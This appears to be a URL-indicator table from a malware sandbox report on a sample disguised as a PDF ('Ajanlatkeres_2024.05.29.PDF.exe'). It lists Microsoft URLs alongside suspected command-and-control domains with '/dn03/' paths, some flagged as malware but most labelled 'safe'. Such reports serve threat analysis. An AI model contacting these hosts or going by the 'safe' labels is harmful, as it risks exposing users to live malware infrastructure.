http://www.bx2zyg.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.banditsolana.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w937xb.com/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.imdcaam.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(	explorer.exe, 00000014.00000003.2299538498.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1351724632.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BD22000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.w937xb.comReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.banditsolana.com/dn03/www.mcapitalparticipacoes.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vivaness.club/dn03/www.w937xb.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.numericalsemantics.com/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.imdcaam.comReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSp	explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.vivaness.club	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/rT	explorer.exe, 00000014.00000000.1348137626.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008796000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.bx2zyg.comReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, YLc7afPlL4RjCeK.exe, 0000000E.00000002.1334933254.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.verxop.xyz/dn03/www.cataclysmicgamingapparel.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.top-dao.comReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.verxop.xyz/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.com	explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ioco.in/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sukhiclothing.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sukhiclothing.com/dn03/www.banditsolana.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSJM	explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.banditsolana.com/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jasonnutter.golf/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.banditsolana.comReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cyberxdefend.com/dn03/www.ioco.in	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mcapitalparticipacoes.comReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.servicepmgtl.world/dn03/www.sukhiclothing.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.numericalsemantics.comReferer:	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cataclysmicgamingapparel.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w937xb.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSZM	explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.w937xb.com/dn03/www.servicepmgtl.world	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.yelp.com	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.top-dao.com/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.servicepmgtl.world/dn03/	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mcapitalparticipacoes.com/dn03/www.top-dao.com	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
